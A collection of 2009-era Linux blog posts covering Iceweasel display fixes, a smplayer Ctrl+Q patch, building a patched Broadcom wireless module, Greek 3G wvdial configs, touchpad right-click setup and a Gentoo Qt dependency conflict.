When using iceweasel 3.0.12 everything looked fine. Then I followed a guide to install Iceweasel 3.5 from experimental to my system. Images looked distorted again. So there must have been a problem with the latest xulrunner….

After some googling I bumped into Debian bug #491871 – [965GM EXA] display corruption with xulrunner 1.9. Following post #67 on that thread I was able to repair my xorg.conf to something that fixed the image distortion. Now Planet Gnome looks like this:

Some info:

# apt-cache policy iceweasel xserver-xorg-video-intel xulrunner-1.9.1
iceweasel:
Installed: 3.5.1-1
Candidate: 3.5.1-1
Version table:
*** 3.5.1-1 0
1 http://ftp.debian.org experimental/main Packages
100 /var/lib/dpkg/status
3.0.12-1 0
500 http://ftp.de.debian.org squeeze/main Packages
99 http://ftp.de.debian.org sid/main Packages
xserver-xorg-video-intel:
Installed: 2:2.3.2-2+lenny6
Candidate: 2:2.3.2-2+lenny6
Version table:
2:2.8.0-2 0
99 http://ftp.de.debian.org sid/main Packages
*** 2:2.3.2-2+lenny6 0
500 http://ftp.de.debian.org squeeze/main Packages
100 /var/lib/dpkg/status
xulrunner-1.9.1:
Installed: 1.9.1.1-2
Candidate: 1.9.1.1-2
Version table:
*** 1.9.1.1-2 0
1 http://ftp.debian.org experimental/main Packages
100 /var/lib/dpkg/status

Filed by kargig at 19:21 under Linux
Tags: 3.5, bug, bugzilla, debian, distortion, driver, exa, firefox, iceweasel, image, intel, Linux, problem, swiftfox, xaa, xorg
No Comments | 1,576 views

One of the things that good Linux applications should have is uniformity. Just like Mac OS X does. All applications should use the same keybindings to perform the same tasks. For example, on _every_ OS X application, in order to quit it you have to press “CMD+Q”, it’s that simple and everybody follows it. Everybody. On Linux though there are some applications that simply don’t care about uniformity. One of these applications is smplayer.

While it is almost standard for Linux applications to quit using Ctrl+Q, smplayer simply doesn’t have this option. It has the option of closing the current video with Ctrl+X but it doesn’t have the simple option of quitting using a keyboard shortcut.

So, the next (oneliner actually) patch does simply what I described above. It makes smplayer quit using “Ctrl+Q”.

The screenshot that shows what the patch does:

smplayer-0.6.8-quit.patch:
--- smplayer-0.6.8/src/baseguiplus.cpp 2009-08-13 16:07:04.000000000 +0300
+++ smplayer-0.6.8/src/baseguiplus.cpp 2009-08-13 16:08:22.000000000 +0300
@@ -67,8 +67,7 @@
tray->setToolTip( "SMPlayer" );
connect( tray, SIGNAL(activated(QSystemTrayIcon::ActivationReason)),
this, SLOT(trayIconActivated(QSystemTrayIcon::ActivationReason)));
-
- quitAct = new MyAction(this, "quit");
+ quitAct = new MyAction(QKeySequence("Ctrl+Q"), this, "quit");
connect( quitAct, SIGNAL(triggered()), this, SLOT(quit()) );
openMenu->addAction(quitAct);

And a patched ebuild for smplayer-0.6.8 to use this minor patch (only one line is added to the ebuild):
smplayer-0.6.8-r1.ebuild

P.S. Keybindings in smplayer can be set through Preferences, and someone could actually put Ctrl+Q as the quit shortcut but I think that this should be the default setting like most other applications have it. Uniformity matters.

Filed by kargig at 16:19 under Gentoo, Linux
Tags: bug, bugfix, ebuild, Gentoo, Linux, Mac, MacOSX, media player, patch, smplayer
5 Comments | 2,922 views

On my Macbook (4,1) I am currently using Debian with kernel 2.6.30-1-686-bigmem. This Macbook has Broadcom 4328 wireless chipset installed (02:00.0 Network controller: Broadcom Corporation BCM4328 802.11a/b/g/n (rev 03)) and unfortunately the necessary kernel module provided by Broadcom is pretty unstable. Or very unstable. Oh well…it’s totally unstable.

I had random freezes, usually when I first booted and tried to modprobe the module. After some searching around the net and a lot of experiments I’ve managed to create a kernel module that looks quite stable. At least I stopped getting any more lockups and freezes…To reproduce the module with the patches I’ve used follow the directions bellow step by step.

Find your kernel version:
mybox:~# uname -r
2.6.30-1-686-bigmem

Install kernel header files related to the kernel version you found (on the above example it is: 2.6.30-1-686-bigmem):
mybox:~# aptitude install linux-headers-2.6.30-1-686-bigmem

Remember to replace the version (2.6.30-1-6-bigmem) with the output of your mybox:~# uname -r

Create necessary dirs:
mybox:~# mkdir hybrid_wl
mybox:~# cd hybrid_wl

Download Linux drivers package from Broadcom:
802.11 Linux STA 32-bit Driver
(Driver info site: 802.11 Linux STA driver)
mybox:~/hybrid_wl# wget http://www.broadcom.com/docs/linux_sta/hybrid-portsrc-x86_32-v5_10_91_9.tar.gz

Download a few more patches from Archlinux and Gentoo:
hidden-essid patch
2.6.30 patch 1
2.6.30 patch 2
hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/hidden-essid.patch
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/broadcom-sta-5.10.91.9-linux-2.6.30.patch
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/broadcom-sta-5.10.91.9-linux-2.6.30-2.patch
mybox:~/hybrid_wl# wget -O hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff http://bugs.gentoo.org/attachment.cgi?id=195182

Extract package:
mybox:~/hybrid_wl# tar -xzf /path/to/hybrid-portsrc-x86_32-v5_10_91_9.tar.gz

Start Patching:
mybox:~/hybrid_wl# sed -i hidden-essid.patch -e 's|5.10.79.10|src/wl/sys|g'
mybox:~/hybrid_wl# patch -p0 < hidden-essid.patch
patching file src/wl/sys/wl_iw.c
mybox:~/hybrid_wl# sed -i broadcom-sta-5.10.91.9-linux-2.6.30.patch -e 's|hybrid-portsrc-x86_32-v5_10_91_9.orig/||g'
mybox:~/hybrid_wl# sed -i broadcom-sta-5.10.91.9-linux-2.6.30.patch -e 's|hybrid-portsrc-x86_32-v5_10_91_9/||g'
mybox:~/hybrid_wl# patch -p0 <broadcom-sta-5.10.91.9-linux-2.6.30.patch
patching file src/wl/sys/wl_iw.c
Hunk #1 succeeded at 611 (offset 1 line).
Hunk #2 succeeded at 640 (offset 1 line).
Hunk #3 succeeded at 1119 (offset 1 line).
Hunk #4 succeeded at 1147 (offset 1 line).
Hunk #5 succeeded at 1807 (offset 1 line).
Hunk #6 succeeded at 1942 (offset 1 line).
patching file src/wl/sys/wl_linux.c
patching file src/wl/sys/wl_linux.h
mybox:~/hybrid_wl# patch -p0 < broadcom-sta-5.10.91.9-linux-2.6.30-2.patch
patching file src/wl/sys/wl_linux.c
mybox:~/hybrid_wl# sed -i hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff -e 's|a/src/|src/|g'
mybox:~/hybrid_wl# sed -i hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff -e 's|b/src/|src/|g'
mybox:~/hybrid_wl# patch -p0 < hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff
patching file src/wl/sys/wl_linux.c
Hunk #1 succeeded at 225 (offset 6 lines).
patching file src/wl/sys/wl_iw.c

Compile the kernel module:
mybox:~/hybrid_wl# make -C /lib/modules/2.6.30-1-686-bigmem/build M=`pwd` clean
make: Entering directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
make: Leaving directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
mybox:~/hybrid_wl# make -C /lib/modules/2.6.30-1-686-bigmem/build M=`pwd`
make: Entering directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
LD /root/hybrid_wl/built-in.o
CC [M] /root/hybrid_wl/src/wl/sys/wl_linux.o
CC [M] /root/hybrid_wl/src/wl/sys/wl_iw.o
CC [M] /root/hybrid_wl/src/shared/linux_osl.o
LD [M] /root/hybrid_wl/wl.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: modpost: missing MODULE_LICENSE() in /root/hybrid_wl/wl.o
see include/linux/module.h for more information
CC /root/hybrid_wl/wl.mod.o
LD [M] /root/hybrid_wl/wl.ko
make: Leaving directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'

Install the new module:
mybox:~/hybrid_wl# cp wl.ko /lib/modules/2.6.30-1-686-bigmem/kernel/drivers/net/wireless/
mybox:~/hybrid_wl# depmod
mybox:~/hybrid_wl# modprobe wl

Check if everything loads correctly:
mybox:~/hybrid_wl# dmesg |tail
[ 66.229797] lib80211: common routines for IEEE802.11 drivers
[ 66.229805] lib80211_crypt: registered algorithm 'NULL'
[ 66.301793] wl: module license 'unspecified' taints kernel.
[ 66.301802] Disabling lock debugging due to kernel taint
[ 66.305919] wl 0000:02:00.0: PCI INT A -> GSI 16 (level, low) -> IRQ 16
[ 66.305933] wl 0000:02:00.0: setting latency timer to 64
[ 66.406146] lib80211_crypt: registered algorithm 'TKIP'
[ 66.408646] eth1: Broadcom BCM4328 802.11 Wireless Controller 5.10.91.9
[ 76.524135] eth1: no IPv6 routers present

You can also chek the iwconfig output. Hopefully everything will be fine…
I hope this saves a few hours of searching and experimenting for some people…

References:
1) 802.11 Linux STA driver
2) AUR broadcom-wl 5.10.91.9-2
3) Gentoo Bug: 284450 (New ebuild: net/wireless/broadcom-sta)

Filed by kargig at 00:22 under Linux
Tags: 2.6.30, Archlinux, broadcom, bug, bugfix, debian, Gentoo, kernel, Linux, module, patch, wireless
9 Comments | 6,761 views

The following configs can be used when you have either Vodafone Mobile Internet or Cosmote Internet on the Go or both 3G USB sticks and you want to connect to the 3G Internet (in Greece) while using Linux. I’ll provide two ways to connect to 3G, the command line way using wvdial and the GUI way using umtsmon.

1) Using wvdial
Create /etc/wvdial.conf:

[Dialer Defaults]
New PPPD = yes
Dial Command = ATDT
Dial Attempts = 1
Modem = /dev/ttyUSB0
Modem Type = Analog Modem
ISDN = 0
#commented out see the comments on the post.
#Baud = 460800
Username = user
Password = pass
Init1 = ATZ
Init2 = AT&F E1 V1 X1 &D2 &C1 S
[Dialer cosmote]
Phone = *99#
Stupid Mode = 1
Init3 = AT+CGDCONT=1,"IP","internet"
[Dialer vodafone]
Phone = *99#
Stupid Mode = 1
Init3 = AT+CGDCONT=1,"IP","internet"
[Dialer vfPIN]
Init4 = AT+CPIN=1234
[Dialer cmPIN]
Init4 = AT+CPIN=5678

WARNING: You HAVE to change the PINs on the last part of the config

To connect to Cosmote, plug in the usb stick:

# wvdial cmPIN
# wvdial cosmote

To connect to Vodafone, plug in the usb stick:

# wvdial vfPIN
# wvdial vodafone

2) Using umtsmon
Connection->Manage Profiles and create the necessary profiles with settings that look like these:

Username and Password does not really matter. Enter something like User/Pass or Username/Password.

Both versions tested on Debian and Gentoo and they are working just fine.

If someone has the Wind ADSM settings please provide them as a comment so I can complete the post with all three Greek 3G providers.

References: List of AT commands

Filed by kargig at 21:38 under Gentoo, Internet, Linux
Tags: 3G, cosmote, debian, Gentoo, Internet, Linux, umtsmon, vodafone, wvdial
8 Comments | 5,913 views

I’ve recently migrated on my debian from iceweasel (firefox) 3.0.X to swiftfox (firefox) 3.5b99 and I noticed that I could not import any new certificate authority root files. When I used a new profile everything worked as expected, so it was something that had to do with the migration of my old version 3.0.X profile to the new, version 3.5. It looks like there has been a modification in the way firefox 3.0.X and firefox 3.5 handles cert8.db file inside the profile directory. As soon as I deleted the file and restarted firefox I could import new certificate authority root files just fine. Of course I lost the old ones I had imported in the past…

Filed by kargig at 03:26 under Linux
Tags: bug, debian, firefox, Linux, migration, swiftfox
No Comments | 1,360 views

I’ve bumped into an Iceweasel + adblock plus bug: iceweasel: AdBlock Plus (1.0.2) custom element hiding filters does not work
It looks like Iceweasel from the stable branch of debian (version 3.0.6-1) has a problem hiding elements from websites. That makes some parts of adblock plus useless and ads start appearing on various websites.
What’s weird is that the problem only appears on Iceweasel and not on official Firefox (as the bug report says).

My options were to either a) switch to a testing/unstable version of Iceweasel from debian, b) get a binary package from firefox website or c) get another custom version. I chose method c) and I got swiftfox. Since Swiftfox provides a nice debian repo it was really easy to install and test. The whole experiment got even more interesting since swiftfox provides builds for firefox version 3.5…

After a update-alternatives --config x-www-browser I was ready to test it.
Swiftfox 3.5b4 works great with adblock plus and it even feels a bit faster. I can’t really tell for sure though. The only addon I had to reinstall was firegpg.

My impressions are great so far and I think I will keep it, at least until the bug mentioned gets resolved somehow on the stable branch.

Filed by kargig at 11:39 under Linux
Tags: adblock plus, browser, bug, debian, firefox, iceweasel, Linux, swiftfox
No Comments | 2,223 views

I’ve finally settled down to a solution that I am happy with. I used to have the following options inside my Xorg.conf:
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
[...snip...]
Option "TapButton1" "1"
Option "TapButton2" "3"
Option "TapButton3" "2"
Option "VertTwoFingerScroll" "1"
Option "HorizTwoFingerScroll" "1"
[...snip...]


This works like this:
i) a single tap is a left click
ii) a two-finger tap is a right click
iii) a three-finger tap is a middle click
and you could scroll horizontally and vertically using two fingers on the touchpad, like Mac OS X.
The problem with this setup is that I used to have a lot of accidental double tappings while scrolling with two fingers horizontally or vertically. This of course produced unwanted right clicks.

I wanted a solution that I could get right click in somehow like Mac OS X does it, using ctrl+tap/ctrl+click. I found a solution that emulated ctrl+click as a right click but then many applications started misbehaving. Firefox for example uses ctrl+click on Linux to open a link on a new tab, when I used ctrl+click as a right click, Firefox stopped opening the links. So I went to plan B.

CMD key(apple key)-click as a right click.

To achieve that:
a) install xvkbd.
Debian: apt-get install xvkbd
Gentoo: emerge xvkbd
b) install xbindkeys.
Debian: apt-get install xbindkeys
Gentoo: emerge xbindkeys
c) create the default .xbindkeysrc file: xbindkeys –defaults > ~/.xbindkeysrc
d) edit it and put the following inside: "xvkbd -text '\m3'"
mod4 + b:1 (mouse)
e) edit xorg.conf and set this: Option "TapButton2" "0"
This effectively disables double tapping as a right click.
f) restart X
g) open a terminal and start xbindkeys from it: $ xbindkeys -n -v
Now press CMD key and tap the touchpad or click the touchpad button. You should be greeted with a fresh right click!

If all went well put xbindkeys in your DE’s autostart.

The following works flawlessly on XFCE/LXDE. CMD-click or CMD-tap opens XFCE’s menu or LXDE’s desktop menu.

On fluxbox though there is still a problem. It’s very common for fluxbox key config to look something like the following:
OnDesktop Mouse1 :hideMenus
OnDesktop Mouse2 :workspaceMenu
OnDesktop Mouse3 :rootMenu
OnDesktop Mouse4 :nextWorkspace
OnDesktop Mouse5 :prevWorkspace


So to open the RootMenu, which is the basic menu with the applications shortcuts for fluxbox, one needs to actually right click on the Desktop. That worked with TabButton2=3 but it does not work right now. To get around that problem I binded the key left to (1/!) which is normally the (±/§) key on Macs to the Menu key using xmodmap.
$ cat .xmodmap
keycode 94 = Menu

I never used that key anyway…

I’ve now got my precious right click back without accidental miss-clicks. yihaa!

References: FreeBSD on an Apple MacBook

Filed by kargig at 22:29 under Gentoo, Linux
Tags: accidental, click, ctrl+tap, ctrl-click, debian, fluxbox, Gentoo, Linux, lxde, macbook, right-click, synaptic, toucpad, xfce
5 Comments | 2,992 views

To complement alex’s post upgrading Qt libraries in Gentoo with Portage, here’s what started it all. I wanted to upgrade my kpdf to the most recent version without upgrading world. So the output of emerge -1uDNavt kpdf looked like this:

[ebuild U ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" 6 kB [0]
[nomerge ] app-mobilephone/pysmssend-1.32 USE="qt4" [?]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[ebuild U ] x11-libs/qt-qt3support-4.5.1 [4.4.2] USE="accessibility -custom-cxxflags% -debug -kde% -pch -phonon%" 111,980 kB [0]
[ebuild U ] x11-libs/qt-sql-4.5.1 [4.4.2-r1] USE="iconv qt3support sqlite -custom-cxxflags -debug -firebird -mysql -odbc -pch -postgres" 0 kB [0]
[nomerge ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild N ] virtual/poppler-qt3-0.10.5 0 kB [0]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[ebuild U ] x11-libs/qt-gui-4.5.1 [4.4.2-r3] USE="accessibility dbus glib gtkstyle%* qt3support -cups -custom-cxxflags -debug -mng -nas -nis -pch -raster% -tiff -xinerama" INPUT_DEVICES="(-wacom%)" 0 kB [0]
[ebuild U ] x11-libs/qt-script-4.5.1 [4.4.2] USE="iconv%* -custom-cxxflags% -debug -pch" 0 kB [0]
[ebuild U ] x11-libs/qt-dbus-4.5.1 [4.4.2] USE="-custom-cxxflags -debug -pch" 0 kB [0]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[nomerge ] x11-libs/qt-svg-4.4.2 USE="-debug -pch" [0]
[blocks b ] >x11-libs/qt-script-4.4.2-r9999 (">x11-libs/qt-script-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-dbus-4.4.2-r9999 (">x11-libs/qt-dbus-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[nomerge ] sys-boot/unetbootin-319 [0]
[nomerge ] x11-libs/qt-gui-4.5.1 [4.4.2-r3] USE="accessibility dbus glib gtkstyle%* qt3support -cups -custom-cxxflags -debug -mng -nas -nis -pch -raster% -tiff -xinerama" INPUT_DEVICES="(-wacom%)" [0]
[blocks b ] [nomerge ] x11-libs/qt-svg-4.4.2 USE="-debug -pch" [0]
[blocks b ] >x11-libs/qt-qt3support-4.4.2-r9999 (">x11-libs/qt-qt3support-4.4.2-r9999" is blocking x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-core-4.4.2-r9999 (">x11-libs/qt-core-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2)
[blocks b ] >x11-libs/qt-sql-4.4.2-r9999 (">x11-libs/qt-sql-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-gui-4.4.2-r9999 (">x11-libs/qt-gui-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[ebuild U ] x11-libs/qt-test-4.5.1 [4.4.2] USE="iconv%* -custom-cxxflags% -debug -pch" 0 kB [0]
[ebuild U ] x11-libs/qt-core-4.5.1 [4.4.2-r2] USE="glib iconv qt3support ssl -custom-cxxflags -debug -doc -pch" 0 kB [0]
[nomerge ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild U ] kde-base/kdeprint-3.5.10 [3.5.9] USE="kdehiddenvisibility -cups -debug -kde (-arts%) (-kdeenablefinal%) (-xinerama%)" 0 kB [0]
[nomerge ] app-text/epdfview-0.1.6-r1 USE="-cups -nls -test" [0]
[nomerge ] virtual/poppler-glib-0.10.5 USE="cairo" [0]
[nomerge ] app-text/poppler-bindings-0.10.5-r1 USE="cairo gtk qt3 qt4 -test" [0]
[nomerge ] app-text/poppler-0.10.5-r1 USE="-doc" [0]
[ebuild U ] media-libs/openjpeg-1.3-r2 [1.3] USE="-tools" 0 kB [0]
[nomerge ] kde-base/kdeprint-3.5.10 [3.5.9] USE="kdehiddenvisibility -cups -debug -kde (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild U ] app-text/enscript-1.6.4-r4 [1.6.4-r3] USE="-nls -ruby" 1,013 kB [?=>0]
[nomerge ] app-pda/msynctool-0.21 [0]
[nomerge ] app-pda/libopensync-0.21 USE="-debug -doc -python" [0]
[ebuild U ] dev-db/sqlite-3.6.13 [3.6.11] USE="threadsafe -debug -doc -soundex -tcl" 0 kB [0]
[blocks B ] [blocks B ] >x11-libs/qt-test-4.4.2-r9999 (">x11-libs/qt-test-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-script-4.4.2-r9999 (">x11-libs/qt-script-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-dbus-4.4.2-r9999 (">x11-libs/qt-dbus-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] [blocks B ] [blocks B ] [blocks B ] [blocks B ] >x11-libs/qt-qt3support-4.4.2-r9999 (">x11-libs/qt-qt3support-4.4.2-r9999" is blocking x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] [blocks B ] [blocks B ] >x11-libs/qt-core-4.4.2-r9999 (">x11-libs/qt-core-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2)
[blocks B ] [blocks B ] >x11-libs/qt-sql-4.4.2-r9999 (">x11-libs/qt-sql-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-gui-4.4.2-r9999 (">x11-libs/qt-gui-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] Total: 13 packages (12 upgrades, 1 new), Size of downloads: 112,998 kB
Conflict: 23 blocks (16 unsatisfied)
Portage tree and overlays:
[0] /usr/portage
[?] indicates that the source repository could not be determined
* Error: The above package list contains packages which cannot be
* installed at the same time on the same system.
('installed', '/', 'x11-libs/qt-svg-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-svg-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge') pulled in by
>=x11-libs/qt-gui-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'sys-boot/unetbootin-319', 'nomerge')
(and 4 more)
('ebuild', '/', 'x11-libs/qt-test-4.5.1', 'merge') pulled in by
x11-libs/qt-test:4 required by ('installed', '/', 'app-text/poppler-bindings-0.10.5-r1', 'nomerge')
('ebuild', '/', 'x11-libs/qt-qt3support-4.5.1', 'merge') pulled in by
~x11-libs/qt-qt3support-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge')
>=x11-libs/qt-qt3support-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-opengl-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-opengl-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('ebuild', '/', 'x11-libs/qt-dbus-4.5.1', 'merge') pulled in by
~x11-libs/qt-dbus-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge')
>=x11-libs/qt-dbus-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-core-4.4.2-r2', 'nomerge') pulled in by
~x11-libs/qt-core-4.4.2 required by ('installed', '/', 'x11-libs/qt-script-4.4.2', 'nomerge')
x11-libs/qt-core required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-core:4[qt3support] required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
(and 7 more)
('installed', '/', 'x11-libs/qt-dbus-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-dbus-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
~x11-libs/qt-dbus-4.4.2 required by ('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge')
('installed', '/', 'x11-libs/qt-qt3support-4.4.2', 'nomerge') pulled in by
~x11-libs/qt-qt3support-4.4.2 required by ('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge')
>=x11-libs/qt-qt3support-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-xmlpatterns-4.4.2', 'nomerge') pulled in by
x11-libs/qt-xmlpatterns:4 required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge') pulled in by
>=x11-libs/qt-gui-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'sys-boot/unetbootin-319', 'nomerge')
(and 6 more)
('ebuild', '/', 'x11-libs/qt-core-4.5.1', 'merge') pulled in by
~x11-libs/qt-core-4.5.1[qt3support,-debug] required by ('ebuild', '/', 'x11-libs/qt-sql-4.5.1', 'merge')
x11-libs/qt-core:4[qt3support] required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
~x11-libs/qt-core-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-script-4.5.1', 'merge')
(and 7 more)

The output is also at: http://dpaste.com/52703/
Unless you are a Gentoo Developer there is no easy way to understand the output.
So I joined #gentoo-el on Freenode to ask the greek gentoo developers (hwoarang, deathwing00, tampakrap, wired, yngwin), which happen to be on QT/KDE herds, to explain to me what’s wrong.
I was suggested to run an emerge -uDavt world to upgrade my whole system, but that’s not what I wanted and I asked for a solution that would not involve upgrading the whole system. The following is the output of emerge -uDNavt world:

http://pastebin.com/m8371430

Then they explained to me that there has been a change on QT eclass to provide protection to the system from having mixed QT versions. The problem is that the protection works by blocking the mix, but the output is at least “unfriendly”.

The solution, as alex said is to do: emerge -av1 `eix -I --only-names x11-libs/qt-`

Even though eix is a standard tool every gentoo user has probably installed, I don’t really like the solution because it depends on using another extra program, eix, and not pure portage techniques. Portage should be able, somehow, to handle these dependency problems and provide a custom error when such a problem occurs. The errors on “-9999″ versions need vast improvement.

I hope Gentoo devs do something about improving portage even more

*EDIT*
After a small conversation with alex, I completely unmerged my x11-libs/qt-4.X package. As it seems it’s not needed at all any longer since all programs correctly reference the x11-libs/qt-NAME-4.X.

